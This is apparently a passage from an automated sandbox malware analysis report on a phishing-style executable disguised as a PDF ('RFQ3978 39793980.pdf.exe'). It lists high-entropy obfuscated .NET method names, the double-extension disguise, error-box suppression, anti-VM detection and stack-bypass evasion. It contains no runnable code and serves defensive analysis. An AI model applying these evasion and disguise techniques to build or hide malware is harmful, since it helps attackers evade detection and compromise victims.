                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, SHAHu8kwuXP8wLUNau.csHigh entropy of concatenated method names: 'ABwRIjqQg3', 'CCYRGYMoCD', 'hKoRiT18uG', 'VQ0RoRqyjl', 'Qh7RV28Ug3', 'KLTRCO3nR7', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, FeHwFRQmPhA6QUTvmZ.csHigh entropy of concatenated method names: 'JNuiyAVAhn', 'uHEinQWvim', 'TnViACOyBI', 'ToString', 'jJLiSMvL2q', 'vfYiE9jbGN', 'T4AaxLK0XF5x7dghKuE', 'ORk4QTKqpv41Jgo9Gt4', 'oPa5UjK5ptlZlcagNZU', 'OqE7Z1KZadl7FAIwCKj'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, rofaPZzvm0BOLRapa7.csHigh entropy of concatenated method names: 'MEpRu7xLZ4', 'xjRR8yQjV5', 'TNORlhrUhK', 'WH7R0fywrT', 'qMVRXe97o1', 'KtpRqTciYu', 'bAYRekW7GF', 'xOdRhABwMx', 'KHTR1lGJFG', 'OGHRTpw3RS'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, fHFDdmJJtlfWjgtnRKg.csHigh entropy of concatenated method names: 'w8ZRkTW7Ts', 'rkjRzqFkcP', 'zb4bMCXY9l', 'NLbbJVk2Pc', 'W7lb40WjNx', 'xaGbvZ2TPA', 'BpIbLijdC4', 'cgsbaSOf2e', 'rcPbdmBoT8', 'lelbNQlk9X'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, IJ6UC68YOxsykVHtee.csHigh entropy of concatenated method names: 'CO7Ntqn4eT', 'uphN25T4KN', 'X5aNyiAh7i', 'J9eNnjUMrO', 'dbINAcp3oj', 'VHRNSNkOUQ', 'QmyNE2yMZJ', 'JZiNPyaI4G', 'FuONjoHwrt', 'FQwNkX4dQi'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, tK9regIp9dFBPQdRwr.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xYe4jZEDek', 'tUS4kE0knv', 'jps4zbZCrV', 'P7LvMTX4DL', 'K25vJNMbsI', 'krQv4tABUl', 'VRyvvIHnWw', 'sSbSVV4mIOcc4f8mNnX'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, nWAOmR0IIsnUrZnq0A.csHigh entropy of concatenated method names: 'vEfiamu9BJ', 'yoviN2aRbB', 'zJ8iG0oTq8', 'OECiosVftY', 'OBFiCUlYoC', 'hBxGAkmqn1', 'eQ6GSxJHrK', 'BwuGE86d3V', 'QFsGPZX7oY', 'suSGjAVVyf'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, vvfvNJJM7tDt7xHoMrm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T9pROh3RMF', 'Sy3R36xEmD', 'YpQRwTMVFl', 'tw9RtEjBhb', 'JvAR2Tsh6Y', 'mU8RyO7D0n', 'nfZRnKSE9Y'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, PBj6MrJ4qttK5WRqmjB.csHigh entropy of concatenated method names: 'ToString', 'TDTb8mnTEa', 'EFCblxU3Lr', 'V08b7EmM42', 'n4Sb0CZMFJ', 'gSmbXTHpNb', 'bnEb5GGBXx', 'C8UbqUcKaV', 'a20PGn6AI5BidqItreu', 'FLrGfZ6TwCB1HlMZYaB'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hu0NnvCl5pXqnShn53.csHigh entropy of concatenated method names: 'EijvarGhPa', 'NnWvdd0cmB', 'yOOvN8ecZE', 'kdgvIPFCoy', 'TnEvGiDuBa', 'yk7viV3UvK', 'pNMvowNcnT', 'H3vvClx377', 'hGKvgXYikx', 'kA3v6vZcJd'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, uDdPq5SSsTgtCfGult.csHigh entropy of concatenated method names: 'eNTZP6MMyl', 'mt3ZktPjq9', 'IkIDM3IIZI', 'KRQDJINOuh', 'cYNZOad33q', 'IefZ3iwjU4', 'N0bZwgqCMi', 'pOHZt8yR9D', 'TuZZ2MtBXj', 'l1RZynWBvd'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, Cjl5nlWxacufWc9j66.csHigh entropy of concatenated method names: 'WXRodnlCwQ', 'kP5oI3T9wv', 'Es0oiE9eOT', 'cecikcHKIE', 'ja4izASsGl', 'a6DoMBEwMg', 'jKHoJB2v1J', 'trOo4N6BZL', 'YRGovnPsvF', 'CQUoLU9lqa'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, d5iEQbEai2WGGbtQeE.csHigh entropy of concatenated method names: 'I9gVFrZNWX', 'O1eVZH36hq', 'nMdVVpHITq', 'HOgVbv3asX', 'P57VcYd4Ow', 'AAbVhTmncD', 'Dispose', 'shLDdxNoSU', 'iZZDNYcMVm', 's5kDI17Zdh'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, n0Ec4941V8pAeRoCBI.csHigh entropy of concatenated method names: 'jeXffEvAR', 'l7cmNFoPW', 'Ru9uHYoNP', 'OVipeMahW', 'GOcliqjKs', 'JS57fN4hH', 'fScCnVfJ7sMoIF93g3', 'QWbk23iEnK8NcdG8b5', 'oU9DvcPCt', 'vbtR3UpBe'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, slP2qVtvydIdFP1CiV.csHigh entropy of concatenated method names: 'OOkFKLmqsZ', 'w1GF3dN1I6', 'S4tFtCndVo', 'IcOF23xOns', 'cdfFXU4a6n', 'MAlF5lmoPs', 'KPiFqTvC36', 'WeLFehfn0u', 'QFKFQDlVDM', 'qQWFWGhkS6'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, Cuv6qVj0OfZ7uX2GRd.csHigh entropy of concatenated method names: 'Gf7V0tEfP1', 'LGcVXgOOQ5', 'BA1V5HlU8F', 'oRsVq9JmHi', 'UjWVeLDGxr', 'LM8VQadEFL', 'fqyVWsyeiG', 'rp8VUaJ616', 'SEtVrlihgb', 'Q5kVKR2E10'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, f2i6HZrXmruBjgMFi9.csHigh entropy of concatenated method names: 'BwAo1f9EoZ', 'vOZoTCKGb7', 'L9LofsM4Xy', 'avmomhCt5Q', 'nVeo90rwXa', 'N4mounNhAV', 'nagopAUdF0', 'RNEo84t17X', 'EPAolJJppy', 'aAgo7iLURV'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, lyDO55NGir3exlIpbG.csHigh entropy of concatenated method names: 'Dispose', 'SWGJjGbtQe', 'EyM4XSCf9K', 'mgBclQOIef', 'VxpJkSUBmI', 'RR8JzuEZBD', 'ProcessDialogKey', 'mOu4Muv6qV', 'GOf4JZ7uX2', 'iRd44yHAHu'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hT40iKJLBf5bHBRraTf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SewxVlpq1Y', 'o3exRMSTlb', 'XNgxb04GYr', 'qWaxxQE6cN', 'cmKxcYHxml', 'VTuxHuoFd0', 'uiMxhyg0ht'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, X5j5JmLpPHLNnncO1L.csHigh entropy of concatenated method names: 'jxqJoJ6UC6', 'pOxJCsykVH', 'P1UJ6G9o9t', 'xZUJsbPa0a', 'VgkJFQhBWA', 'OmRJYIIsnU', 'tDNjIH7yiTpVs60c6k', 'KW0USvSqusuxvoYtu1', 'rNiJJcO66E', 'OUjJvBrX8y'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, IWYkp3wVTHLkM3PdwN.csHigh entropy of concatenated method names: 'sR5B8kWnuP', 'J0BBldvTdv', 'QdXB0Fi3Tq', 'geIBX0UDai', 'oYJBq6FD6j', 'BRtBedQLup', 'ElrBWfTKCb', 'xnJBU9Xa6N', 'WiBBKL4WV0', 'OGTBO3ZJeZ'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, Nvtpmwl1UG9o9t1ZUb.csHigh entropy of concatenated method names: 'OTEImePWeQ', 'bvGIuVtfO6', 'G6RI87nqy9', 'W1aIljwEhj', 'S8hIFv80lq', 'bvxIYpNrPd', 'RKcIZO0yQW', 'OagIDfDHyQ', 'H8hIVYIcat', 'TE5IRZAvuR'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, Wa0ahX7UnPHLaEgkQh.csHigh entropy of concatenated method names: 'FLvG9O8Xm5', 'PaRGpiq5NL', 'f83I52DmQD', 'Tk5Iq3eAWM', 'kRXIeEwath', 'qm4IQF2j7X', 'bxQIWsljcH', 'YVjIUHf8To', 'yRmIrt9T5u', 'gadIK7Y3Zh'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, i1ysRwn5uJHGk9UWYS.csHigh entropy of concatenated method names: 'QDgZ6376M2', 'Ly0ZsoBjnU', 'ToString', 'ydUZdlvRRJ', 'fJiZNUDvlM', 'VDPZI1Omsh', 'sHEZGKoAUt', 'ojIZiOMvxU', 'JIuZoDTd0t', 'UhAZC9D8NV'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, SHAHu8kwuXP8wLUNau.csHigh entropy of concatenated method names: 'ABwRIjqQg3', 'CCYRGYMoCD', 'hKoRiT18uG', 'VQ0RoRqyjl', 'Qh7RV28Ug3', 'KLTRCO3nR7', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, FeHwFRQmPhA6QUTvmZ.csHigh entropy of concatenated method names: 'JNuiyAVAhn', 'uHEinQWvim', 'TnViACOyBI', 'ToString', 'jJLiSMvL2q', 'vfYiE9jbGN', 'T4AaxLK0XF5x7dghKuE', 'ORk4QTKqpv41Jgo9Gt4', 'oPa5UjK5ptlZlcagNZU', 'OqE7Z1KZadl7FAIwCKj'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, rofaPZzvm0BOLRapa7.csHigh entropy of concatenated method names: 'MEpRu7xLZ4', 'xjRR8yQjV5', 'TNORlhrUhK', 'WH7R0fywrT', 'qMVRXe97o1', 'KtpRqTciYu', 'bAYRekW7GF', 'xOdRhABwMx', 'KHTR1lGJFG', 'OGHRTpw3RS'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, fHFDdmJJtlfWjgtnRKg.csHigh entropy of concatenated method names: 'w8ZRkTW7Ts', 'rkjRzqFkcP', 'zb4bMCXY9l', 'NLbbJVk2Pc', 'W7lb40WjNx', 'xaGbvZ2TPA', 'BpIbLijdC4', 'cgsbaSOf2e', 'rcPbdmBoT8', 'lelbNQlk9X'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, IJ6UC68YOxsykVHtee.csHigh entropy of concatenated method names: 'CO7Ntqn4eT', 'uphN25T4KN', 'X5aNyiAh7i', 'J9eNnjUMrO', 'dbINAcp3oj', 'VHRNSNkOUQ', 'QmyNE2yMZJ', 'JZiNPyaI4G', 'FuONjoHwrt', 'FQwNkX4dQi'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, tK9regIp9dFBPQdRwr.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xYe4jZEDek', 'tUS4kE0knv', 'jps4zbZCrV', 'P7LvMTX4DL', 'K25vJNMbsI', 'krQv4tABUl', 'VRyvvIHnWw', 'sSbSVV4mIOcc4f8mNnX'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, nWAOmR0IIsnUrZnq0A.csHigh entropy of concatenated method names: 'vEfiamu9BJ', 'yoviN2aRbB', 'zJ8iG0oTq8', 'OECiosVftY', 'OBFiCUlYoC', 'hBxGAkmqn1', 'eQ6GSxJHrK', 'BwuGE86d3V', 'QFsGPZX7oY', 'suSGjAVVyf'
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, vvfvNJJM7tDt7xHoMrm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T9pROh3RMF', 'Sy3R36xEmD', 'YpQRwTMVFl', 'tw9RtEjBhb', 'JvAR2Tsh6Y', 'mU8RyO7D0n', 'nfZRnKSE9Y'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, PBj6MrJ4qttK5WRqmjB.csHigh entropy of concatenated method names: 'ToString', 'TDTb8mnTEa', 'EFCblxU3Lr', 'V08b7EmM42', 'n4Sb0CZMFJ', 'gSmbXTHpNb', 'bnEb5GGBXx', 'C8UbqUcKaV', 'a20PGn6AI5BidqItreu', 'FLrGfZ6TwCB1HlMZYaB'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hu0NnvCl5pXqnShn53.csHigh entropy of concatenated method names: 'EijvarGhPa', 'NnWvdd0cmB', 'yOOvN8ecZE', 'kdgvIPFCoy', 'TnEvGiDuBa', 'yk7viV3UvK', 'pNMvowNcnT', 'H3vvClx377', 'hGKvgXYikx', 'kA3v6vZcJd'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, uDdPq5SSsTgtCfGult.csHigh entropy of concatenated method names: 'eNTZP6MMyl', 'mt3ZktPjq9', 'IkIDM3IIZI', 'KRQDJINOuh', 'cYNZOad33q', 'IefZ3iwjU4', 'N0bZwgqCMi', 'pOHZt8yR9D', 'TuZZ2MtBXj', 'l1RZynWBvd'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, Cjl5nlWxacufWc9j66.csHigh entropy of concatenated method names: 'WXRodnlCwQ', 'kP5oI3T9wv', 'Es0oiE9eOT', 'cecikcHKIE', 'ja4izASsGl', 'a6DoMBEwMg', 'jKHoJB2v1J', 'trOo4N6BZL', 'YRGovnPsvF', 'CQUoLU9lqa'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, d5iEQbEai2WGGbtQeE.csHigh entropy of concatenated method names: 'I9gVFrZNWX', 'O1eVZH36hq', 'nMdVVpHITq', 'HOgVbv3asX', 'P57VcYd4Ow', 'AAbVhTmncD', 'Dispose', 'shLDdxNoSU', 'iZZDNYcMVm', 's5kDI17Zdh'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, n0Ec4941V8pAeRoCBI.csHigh entropy of concatenated method names: 'jeXffEvAR', 'l7cmNFoPW', 'Ru9uHYoNP', 'OVipeMahW', 'GOcliqjKs', 'JS57fN4hH', 'fScCnVfJ7sMoIF93g3', 'QWbk23iEnK8NcdG8b5', 'oU9DvcPCt', 'vbtR3UpBe'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, slP2qVtvydIdFP1CiV.csHigh entropy of concatenated method names: 'OOkFKLmqsZ', 'w1GF3dN1I6', 'S4tFtCndVo', 'IcOF23xOns', 'cdfFXU4a6n', 'MAlF5lmoPs', 'KPiFqTvC36', 'WeLFehfn0u', 'QFKFQDlVDM', 'qQWFWGhkS6'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, Cuv6qVj0OfZ7uX2GRd.csHigh entropy of concatenated method names: 'Gf7V0tEfP1', 'LGcVXgOOQ5', 'BA1V5HlU8F', 'oRsVq9JmHi', 'UjWVeLDGxr', 'LM8VQadEFL', 'fqyVWsyeiG', 'rp8VUaJ616', 'SEtVrlihgb', 'Q5kVKR2E10'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, f2i6HZrXmruBjgMFi9.csHigh entropy of concatenated method names: 'BwAo1f9EoZ', 'vOZoTCKGb7', 'L9LofsM4Xy', 'avmomhCt5Q', 'nVeo90rwXa', 'N4mounNhAV', 'nagopAUdF0', 'RNEo84t17X', 'EPAolJJppy', 'aAgo7iLURV'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, lyDO55NGir3exlIpbG.csHigh entropy of concatenated method names: 'Dispose', 'SWGJjGbtQe', 'EyM4XSCf9K', 'mgBclQOIef', 'VxpJkSUBmI', 'RR8JzuEZBD', 'ProcessDialogKey', 'mOu4Muv6qV', 'GOf4JZ7uX2', 'iRd44yHAHu'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hT40iKJLBf5bHBRraTf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SewxVlpq1Y', 'o3exRMSTlb', 'XNgxb04GYr', 'qWaxxQE6cN', 'cmKxcYHxml', 'VTuxHuoFd0', 'uiMxhyg0ht'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, X5j5JmLpPHLNnncO1L.csHigh entropy of concatenated method names: 'jxqJoJ6UC6', 'pOxJCsykVH', 'P1UJ6G9o9t', 'xZUJsbPa0a', 'VgkJFQhBWA', 'OmRJYIIsnU', 'tDNjIH7yiTpVs60c6k', 'KW0USvSqusuxvoYtu1', 'rNiJJcO66E', 'OUjJvBrX8y'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, IWYkp3wVTHLkM3PdwN.csHigh entropy of concatenated method names: 'sR5B8kWnuP', 'J0BBldvTdv', 'QdXB0Fi3Tq', 'geIBX0UDai', 'oYJBq6FD6j', 'BRtBedQLup', 'ElrBWfTKCb', 'xnJBU9Xa6N', 'WiBBKL4WV0', 'OGTBO3ZJeZ'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, Nvtpmwl1UG9o9t1ZUb.csHigh entropy of concatenated method names: 'OTEImePWeQ', 'bvGIuVtfO6', 'G6RI87nqy9', 'W1aIljwEhj', 'S8hIFv80lq', 'bvxIYpNrPd', 'RKcIZO0yQW', 'OagIDfDHyQ', 'H8hIVYIcat', 'TE5IRZAvuR'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, Wa0ahX7UnPHLaEgkQh.csHigh entropy of concatenated method names: 'FLvG9O8Xm5', 'PaRGpiq5NL', 'f83I52DmQD', 'Tk5Iq3eAWM', 'kRXIeEwath', 'qm4IQF2j7X', 'bxQIWsljcH', 'YVjIUHf8To', 'yRmIrt9T5u', 'gadIK7Y3Zh'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, i1ysRwn5uJHGk9UWYS.csHigh entropy of concatenated method names: 'QDgZ6376M2', 'Ly0ZsoBjnU', 'ToString', 'ydUZdlvRRJ', 'fJiZNUDvlM', 'VDPZI1Omsh', 'sHEZGKoAUt', 'ojIZiOMvxU', 'JIuZoDTd0t', 'UhAZC9D8NV'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, SHAHu8kwuXP8wLUNau.csHigh entropy of concatenated method names: 'ABwRIjqQg3', 'CCYRGYMoCD', 'hKoRiT18uG', 'VQ0RoRqyjl', 'Qh7RV28Ug3', 'KLTRCO3nR7', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, FeHwFRQmPhA6QUTvmZ.csHigh entropy of concatenated method names: 'JNuiyAVAhn', 'uHEinQWvim', 'TnViACOyBI', 'ToString', 'jJLiSMvL2q', 'vfYiE9jbGN', 'T4AaxLK0XF5x7dghKuE', 'ORk4QTKqpv41Jgo9Gt4', 'oPa5UjK5ptlZlcagNZU', 'OqE7Z1KZadl7FAIwCKj'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, rofaPZzvm0BOLRapa7.csHigh entropy of concatenated method names: 'MEpRu7xLZ4', 'xjRR8yQjV5', 'TNORlhrUhK', 'WH7R0fywrT', 'qMVRXe97o1', 'KtpRqTciYu', 'bAYRekW7GF', 'xOdRhABwMx', 'KHTR1lGJFG', 'OGHRTpw3RS'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, fHFDdmJJtlfWjgtnRKg.csHigh entropy of concatenated method names: 'w8ZRkTW7Ts', 'rkjRzqFkcP', 'zb4bMCXY9l', 'NLbbJVk2Pc', 'W7lb40WjNx', 'xaGbvZ2TPA', 'BpIbLijdC4', 'cgsbaSOf2e', 'rcPbdmBoT8', 'lelbNQlk9X'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, IJ6UC68YOxsykVHtee.csHigh entropy of concatenated method names: 'CO7Ntqn4eT', 'uphN25T4KN', 'X5aNyiAh7i', 'J9eNnjUMrO', 'dbINAcp3oj', 'VHRNSNkOUQ', 'QmyNE2yMZJ', 'JZiNPyaI4G', 'FuONjoHwrt', 'FQwNkX4dQi'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, tK9regIp9dFBPQdRwr.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xYe4jZEDek', 'tUS4kE0knv', 'jps4zbZCrV', 'P7LvMTX4DL', 'K25vJNMbsI', 'krQv4tABUl', 'VRyvvIHnWw', 'sSbSVV4mIOcc4f8mNnX'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, nWAOmR0IIsnUrZnq0A.csHigh entropy of concatenated method names: 'vEfiamu9BJ', 'yoviN2aRbB', 'zJ8iG0oTq8', 'OECiosVftY', 'OBFiCUlYoC', 'hBxGAkmqn1', 'eQ6GSxJHrK', 'BwuGE86d3V', 'QFsGPZX7oY', 'suSGjAVVyf'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, vvfvNJJM7tDt7xHoMrm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T9pROh3RMF', 'Sy3R36xEmD', 'YpQRwTMVFl', 'tw9RtEjBhb', 'JvAR2Tsh6Y', 'mU8RyO7D0n', 'nfZRnKSE9Y'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Uses an obfuscated file name to hide its real file extension (double extension)
                Source: Possible double extension: pdf.exeStatic PE information: RFQ3978 39793980.pdf.exe
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: RFQ3978 39793980.pdf.exe PID: 6668, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: 2710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeMemory allocated: 4710000 memory reserve | memory write watchJump to behavior
